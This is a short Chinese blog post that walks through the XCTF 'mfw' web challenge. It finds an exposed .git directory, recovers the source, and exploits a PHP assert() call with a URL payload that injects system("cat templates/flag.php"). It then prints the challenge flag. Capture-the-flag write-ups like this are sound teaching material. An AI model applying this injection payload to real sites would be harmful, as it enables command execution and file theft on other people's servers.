刘功瑞的博客

有一天你突然惊醒,发现这一切,都只不过是一场梦。

2019年10月21日

攻防世界 XCTF WEB 高手区 mfw WriteUp

mfw

题目:

1.png

解题:

简单浏览之后,发现有flag.php文件,而且使用了git,http://111.198.29.45:42959/.git 也存在

使用工具下载源码

1.png以为得到flag了,但是flag.php里面并没有

1.png

还得另寻办法

1.png

下载的源码中有assert,可以构造命令执行,http://111.198.29.45:42959/?page=%27)or%20system(%22cat%20templates/flag.php%22);//

1.png

cyberpeace{0a902069be844ccf8c38207716f18c2e}

作者:admin , 分类:CTF , 浏览:634 , 评论:0

发表评论:

Powered By Z-BlogPHP 1.5.2 Zero

Copyright www.liugongrui.com.All Rights Reserved.